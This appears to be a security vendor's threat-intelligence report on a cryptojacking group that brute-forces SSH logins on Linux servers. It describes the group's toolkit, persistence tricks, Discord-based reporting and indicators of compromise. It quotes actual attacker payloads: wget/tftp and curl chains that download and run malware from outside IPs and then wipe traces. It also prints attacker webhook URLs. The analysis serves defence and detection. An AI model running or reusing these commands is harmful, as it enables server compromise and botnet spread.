1/14

How We Tracked a Threat Group Running an Active Cryptojacking Campaign
bitdefender.com/blog/labs/how-we-tracked-a-threat-group-running-an-active-cryptojacking-campaign

Anti-Malware Research
10 min read

Bitdefender
July 14, 2021

One product to protect all your devices, without slowing them down. 
 Free 90-day trial

https://www.bitdefender.com/blog/labs/how-we-tracked-a-threat-group-running-an-active-cryptojacking-campaign
http://10.10.0.46/blog/labs/tag/antimalware-research/
http://10.10.0.46/blog/labs/author/bitdefenderteam/
http://10.10.0.46/blog/labs/author/bitdefenderteam/
http://10.10.0.46/media/html/consumer/new/get-your-90-day-trial-opt/index.html


2/14

Bitdefender security researchers have discovered a threat group likely based in Romania that's been active since at least 2020. They've been
targeting Linux-based machines with weak SSH credentials, mainly to deploy Monero mining malware, but their toolbox allows for other kinds
of attacks.

Hackers going after weak SSH credentials is not uncommon. Among the biggest problems in security are default user names and passwords,
or weak credentials hackers can overcome easily with brute force. The tricky part is not necessarily brute-forcing those credentials but doing it
in a way that lets attackers go undetected.

Like any other threat group, the tools and methods they use can identify them. In this case, their activity involves obfuscating Bash scripts by
compiling them with a shell script compiler (shc) and using Discord to report the information back.

In addition to traditional tools such as masscan  and zmap , the threat actors' toolkit includes a previously unreported SSH bruteforcer
written in Golang. This tool appears to be distributed on an as-a-service model, as it uses a centralized API server. Each threat actor supplies
their API key in their scripts. Like most other tools in this kit, the brute force tool has its interface in a mix of Romanian and English. This leads
us to believe that its author is part of the same Romanian group.

Introduction

We started investigating this group in May 2021 because of their cryptojacking campaign with the .93joshua  loader. Surprisingly, we traced
the malware easily to http://45[.]32[.]112[.]68/.sherifu/.93joshua  in an open directory. It turns out that the server hosted other
files. Although the group hid many of the files, their inclusion in other scripts revealed their presence. The associated domain, mexalz.us, has
hosted malware at least since February 2021.

The front page of 45[.]32[.]112[.]68 :



3/14

The front page of mexalz.us:



4/14

The following tree shows an aggregated representation of the files currently or formerly hosted on mexalz[.]us:



5/14

mexalz.us 
|-- .sherifu/ 
|   |   .93joshua 
|   |   .k4m3l0t 
|   |   .purrple 
|   |   .zte_error 
|   |   find.sh 
|   |-- jack.tar.gz 
|   |   |-- .jack1992/ 
|   |   |   |   brute 
|   |   |   |   dabrute 
|   |   |   |   lists/ 
|   |   |   |   mass 
|   |   |   |   masscan 
|   |   |   |   pass 
|   |   |   |   ranges_1.lst 
|   |   juanito.tar.gz 
|   |   |-- .juanito/ 
|   |   |   |   brute 
|   |   |   |   go 
|   |   |   |   pass 
|   |   |   |   ps2 
|   |   |   |   r 
|   |   kamelot.tar.gz 
|   |   |-- .md/ 
|   |   |   go 
|   |   |   haiduc 
|   |   |   pass 
|   |   satan.db 
|   |   scn.tar.gz 
|   |   |-- .md/ 
|   |   |   go 
|   |   |   haiduc 
|   |   |   pass 
|   |   sefu 
|   |   skamelot.tar.gz 
|   |   |-- .b87kamelot/ 
|   |   |   |   99x 
|   |   |   |   go 
|   |   |   |   p 
|   |   |   |   r 
|   |   sky 
|-- .mini 
|   |   .black 
|   |   .report_system 
|   |   PhoenixMiner.tar 
|   |   banner 
|   |   ethminer.tar 
|   |   masscan 

We'll be focusing on the original tools in this kit. Some of the files deserve special mention, as they can be connected to attacks seen in the
wild.

The files sefu  (bash script) and satan.db  (gzip archive) are used to propagate the chernobyl  Demonbot variant, which is hosted on a
different server. The infection payload follows these simple steps:

cd /tmp cd /run cd /; 
wget http://194[.]33[.]45[.]197:8080/chernobyl/chernobyl.sh; 
chmod 777 chernobyl.sh; 
sh chernobyl.sh chernobyl; 
tftp 194[.]33[.]45[.]197 -c get chernobyltftp1.sh; 
chmod 777 chernobyltftp1.sh; 
sh chernobyltftp1.sh chernobyl; 
tftp -r chernobyltftp2.sh -g 194[.]33[.]45[.]197; 
chmod 777 chernobyltftp2.sh; 
sh chernobyltftp2.sh chernobyl; 
rm -rf chernobyl.sh chernobyltftp1.sh chernobyltftp2.sh; 
rm -rf *; 
history -c

sky  is a common Perl IRC bot, customized only in respect to the server details and used nicknames. Its C2 is at
area17[.]mexalz[.]us:6667 .



6/14

Finding the victims

There's no shortage of compromisable Linux machines with weak SSH credentials. The trick is to find them, and that's done through
scanning. Attackers host several archives on the server, including jack.tar.gz , juanito.tar.gz , scn.tar.gz  and
skamelot.tar.gz .

These contain toolchains for cracking servers with weak SSH credentials. We can separate this process into three stages:

reconnaissance: identifying SSH servers via port scanning and banner grabbing
credential access: identifying valid credentials via brute-force
initial access: connecting via SSH and executing the infection payload

Depending on the stage, the attackers use different tools. For example, ps  and masscan  are used for reconnaissance, while 99x  /
haiduc  (both Outlaw malware) and `brute` are used for credential access and initial access.

In the currently live campaign, the attackers use the `skamelot.tar.gz`, which includes the following files:

r  (SHC compiled script) iterates through IP classes and runs go
go  (SHC compiled script) runs 99x  (haiduc) with the infection payload
p  is a list of attempted credentials

The infection payload executed in the SSH sessions is:

curl -O http://45[.]32[.]112[.]68/.sherifu/.93joshua && chmod 777 .93joshua && ./.93joshua && uname -a

Note: This file is still online, but attackers relocated to mexalz.us .

It all begins with a loader

After the attackers find and enter into a Linux device with inadequate SSH credentials, they deploy and execute the loader. In the current
campaign, they use .93joshua , but they have a couple of others at their disposal; .purrple  and .black . All of the loaders are
obfuscated via shc .

The loader gathers system information and relays it to the attacker using an HTTP POST to a Discord webhook. By using Discord, the threat
actors circumvent the need to host their own command-and-control server, as webhooks are means to post data on Discord channel
programmatically. The gathered data can also be conveniently viewed on a channel.

Discord is increasingly popular among threat actors because of this functionality, as it involuntarily provides support for malware distribution
(use of its CDN), command-and-control (webhooks) or creating communities centered around buying and selling malware source code and
services (e.g. DDoS).

The information gathered at this step lets the threat actor witness the effectiveness of their tools in infecting machines. The list of victims may
also be collected to carry out potential post-exploitation steps.

In another step of its operation, the loader alters the shell configuration, overwriting the .bashrc  and .bash_profile  files. The auxiliary
file /usr/.SQL-Unix/.SQL/.db , used to store part of the commands, is executed via the source built-in in .bashrc . This script, in turn,
contains commands that overwrite .bashrc .



7/14

Several shell commands are disabled using bash aliases. The purpose of these configurations is to render the shell inoperable to other
operators, whether they are competing in the realms of malware or they’re legitimate users of the system.

The attackers also try to achieve persistence so the loader drops some redundant scripts. Their names differ between versions of the loader,
so we will refer to those in the .93joshua  script:

· .k93  is used to launch the miner (.k4m3l0t)
· /usr/bin/sshd  is a systemd  service script that launches .k93
· .5p4rk3l5  is a crontab file that executes .93joshua  and .k93

Several persistence methods are employed:

· creating a user and adding it to the sudo group; various names are used: gh0stx , sclipicibosu , mexalzsherifu
· adding a SSH key to authorized_keys  (attackers cycled through three different keys depending on the script)
· creating a systemd  service called myservice  which runs the /usr/bin/sshd  script:



8/14

Mining for Monero

All of this effort is currently directed towards Monero mining. While the current campaign concerns cryptojacking, we have connected this
group to several DDoS botnets: a Demonbot variant called chernobyl  and a Perl IRC bot.

As you all know, mining for cryptocurrency is slow and tedious, but it can go faster when using multiple systems. Owning multiple systems for
mining is not cheap, so attackers try the next best thing: to remotely compromise devices and use them for mining instead.

In this case, the group uses custom compiled binaries with embedded configurations of a legitimate miner named XMRig. Typically, the JSON
configuration file, which also includes the users and where the currency goes, is external. But in this compiled version, the configuration file in
embedded.

Unfortunately, brute force still works

People are the simple reason why brute-forcing SSH credentials still works. Dedicated tools are required for this process, and, in this
situation, it's something developed by the group itself.

This tool, which its author dubbed "Diicot brute", is contained in jack.tar.gz  and juanito.tar.gz  archives.

As the usage string from the binary shows, it takes as command-line arguments a port, an "API key", number of threads, a file containing a
list of IP addresses to be scanned, and a timeout value (seconds).

Syntax: ./brute [ Port ] [ Key ] [ Routines ] [ IP File ] [ Timeout ]

Written in Golang, the binary was developed in a single package, which contains the following functions:

https://github.com/xmrig/xmrig


9/14

While most of the tools used by Mexalz can be used by themselves, the "Diicot bruter" is meant to operate on a SaaS (software as a service)
model. The binary communicates with three servers:

an update server (cdn[.]arhive[.]online)
an API server (requests[.]arhive[.]online)
Discord API servers

The tool requires an "API key", supplied as a command-line argument. The key is provided as a parameter in the API endpoints used to
retrieve the user's configuration. The configuration includes the user's Discord ID, a Discord webhook where the tool's output is POSTed, and
a version number (presumably, the latest version to which the user is licensed to use).

The dabrute  and go  scripts contain keys of this type. Rather than random strings, they look like user names and differ between the two
instances, strengthening the assumption that the owners of this toolkit are distinct individuals belonging to the same threat group that share
tools among themselves.

Discord hooks are used to report on:

the start and finish of the tool's execution
successful exploitations

Two types of hooks are used: user-dependent, which are retrieved from the API server using the API key, and global, which are hardcoded.

The global hooks are:

https://discord[.]com/api/webhooks/796089316517347369/zRjSflkA7z9C4N9PaPWIJQFLMSKGk5iJNv9T_Z880jhLOpkQ3OEGsbdz4GsX80
https://discord[.]com/api/webhooks/845977569446068234/ggGoh-
5DEpMLtIi0OKNc8z3b3MgxjZaxovL0R0dBiMsP0hnMTIkNx_JoFTLKJtbyRSx

The main.remoteRun  function is executed in a dedicated goroutine (lightweight thread) for each (host, username, password) combination.
The implementation of the SSH protocol is provided by the standard library package golang.org/x/crypto/ssh .

After a successful authentication, the following bash commands are executed in the session with the purpose of collecting system
information:

uname -s -v -n -r -m 
uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2\" \"$3 }' 
uptime | grep -ohe '[0-9.*] user[s,]' 
lscpu | sed -nr '/Model name/ s/.*:\\s*(.*) @ .*/\\1/p' 
nproc --all 
nvidia-smi -q | grep \"Product Name\" 
lspci 
cut -d: -f6 /etc/passwd | grep \"/home/\"

Notably, one of the commands intends to discover the GPU model, which would be useful to judge the victim's potential in a cryptojacking
scheme.

Owing to an auto-update feature in the binaries, we managed to locate where it is hosted and gain insight into how it is distributed. The
update server is set up using Github pages.

The repository is revealed by following the redirect chain:

cdn[.]arhive[.]online/brute -> developer60-stack.github.io/payload.github.io/cdn/brute

The repository (github.com/developer60-stack/payload.github.io) contains:

setup, an example usage of the brute  tool that chains the zmap  port scanner, a banner grabber and a stage for filtering out SSH
servers that do not accept password authentication
brute , the compiled tool
install , a script for installing dependencies and downloading the tool; both setup and install report after every execution stage to a

Discord hook

https://discord/
https://discord/


10/14

Created on May 1 2021, the repository underwent 35 updates (commits).

An advertisement posted on the hacking forum cracked[.]to in November 2020 shows the price charged for this service and a collage of
images showing its interface, including screenshots from the Discord channel.

(censor not in original)



11/14

(censor belongs to original)
The author claims that their tool can filter out honeypots, but this investigation is proof that it doesn't, or at least it couldn’t evade ours.

Our honeypot data shows attacks matching this tool's signature starting in January 2021. The IP addresses they originate from belong to a
relatively small set, which tells us that the threat actors are not yet using compromised systems to propagate the malware (worm behavior).

More information about this threat actor can be freely provided to law enforcement agencies by reaching out to draco@bitdefender.com.

Indicators of compromise

Samples:

sha256 type name purpose

d73a1c77783712e67db71cbbaabd8f158bb531d23b74179cda8b8138ba15941e ELF .93joshua loader

ed2ae1f0729ef3a26c98b378b5f83e99741b34550fb5f16d60249405a3f0aa33 ELF .zte_error miner

ef335e12519f17c550bba98be2897d8e700deffdf044e1de5f8c72476c374526 ELF .k4m3l0t miner

9de853e88ba363b124dfce61bc766f8f42c84340c7bd2f4195808434f4ed81e3 ELF .black loader

eb0f3d25e1023a408f2d1f5a05bf236a00e8602a84f01e9f9f88ff51f04c8c94 ELF .purrple loader

dcc52c4446adba5a61e172b973bca48a45a725a1b21a98dafdf18223ec8eb8b9 ELF .report_system miner

99531a7c39e3ea9529f5f43234ca5b23cb7bb82ee54f04eff631f5ca9153e6d4 ELF go scanner

74a425bcb5eb76851279b420c8da5f57a1f0a99a11770182c356ba3160344846 ELF go scanner

9f691e132f5a2c9468f58aeac9b7aa5df894d1ad54949f87364d1df2bf005414 script go scanner

f53241f60a59ba20d29fab8c973a5b4c05c24865ae033fffb7cdfa799f0ad25d ELF r scanner

275ef26528f36f1af516b0847d90534693d4419db369027b981f77d79f07d357 script dabrute scanner

8beccb10b004308cadad7fa86d6f2ff47c92c95fc557bf05188c283df6942c13 ELF brute scanner

f9ed735b2b8f89f9d8edfc6a8d11a4ee903e153777b33d214c245a02636d7745 ELF brute scanner

23cf4c34f151c622a5818ade68286999ae4db7364b5d9ed7b8ed035c58116179 script sky IRC bot

8dfdbc66ac4a38766ca1cb45f9b50e0f7f91784ad9b6227471469ae5793f6584 script find.sh scanner

f1d4e2d8f63c3b68d56c668aafbf1c82d045814d457c9c83b37115b61c535baa archive jack.tar.gz

3078662f56861c98f96f8bc8647ffa70522dbc22cbd7ba91b9c80bc667d2a3a9 archive juanito.tar.gz

2a8298047add78360dc3e6d5ac4a38ddb7a67deebc769b1201895afe39b8c0e1 archive kamelot.tar.gz

7bfb35caf3f8760868c2985c4ccf749b14deab63ac6effd653871094fed0d5e5 archive satan.db

f6e92eff8887ee28eb56602a3588a3d39ca24a35d9f88fe2551d87dc6ced8913 archive scn.tar.gz



12/14

sha256 type name purpose

8bf108ab897a480c44d56088662e592c088939eeb86cccaac6145de35eb3a024 script sefu

31a88ff5c0888bcbbbd02c1c18108c884ff02fd93a476e738d22b627e24601c0 archive skamelot.tar.gz

e89b40a6e781ad80d688d1aa4677151805872b50a08aaf8aa64291456e4d476d archive PhoenixMiner.tar

2ef26484ec9e70f9ba9273a9a7333af195fb35d410baf19055eacbfa157ef251 ELF banner scanner

8970d74d96558b280567acdf147bfe289c431d91a150797aa5e3a8e8d52fb27d archive ethminer.tar

9aa8a11a52b21035ef7badb3f709fa9aa7e757788ad6100b4086f1c6a18c8ab2 ELF masscan scanner

1275e604a90acc2a0d698dde5e972ff30d4c506eae526c38c5c6aaa6a113f164 script setup

977dc6987a12c27878aef5615d2d417b2b518dc2d50d21300bfe1b700071d90e script install

ccda60378a7f3232067e2d7cd0efe132e7a3f7c6a299e64ceba319c1f93a9aa2 ELF brute scanner

Paths:

/usr/bin/.locationesclipiciu
/var/tmp/.ladyg0g0/.pr1nc35
/usr/.SQL-Unix/.SQL/.db
/var/tmp/.SQL-Unix/.SQL/.db
/usr/bin/.pidsclip

Network indicators:

Mexalz[.]us
area17[.]mexalz[.]us
45[.]32[.]112[.]68
207[.]148[.]118[.]221
requests[.]arhive[.]online
cdn[.]arhive[.]online

Attack matrix:



13/14

TAGS

anti-malware research

AUTHOR

Bitdefender

The meaning of Bitdefender’s mascot, the Dacian Draco, a symbol that depicts a mythical animal with a wolf’s head and a dragon’s body, is
“to watch” and to “guard with a sharp eye.”

View all posts

http://10.10.0.46/blog/labs/tag/antimalware-research/
http://10.10.0.46/blog/labs/author/bitdefenderteam/
http://10.10.0.46/blog/labs/author/bitdefenderteam/
http://10.10.0.46/blog/labs/author/bitdefenderteam/


14/14

http://10.10.0.46/blog/labs/author/bitdefenderteam/
Bitdefender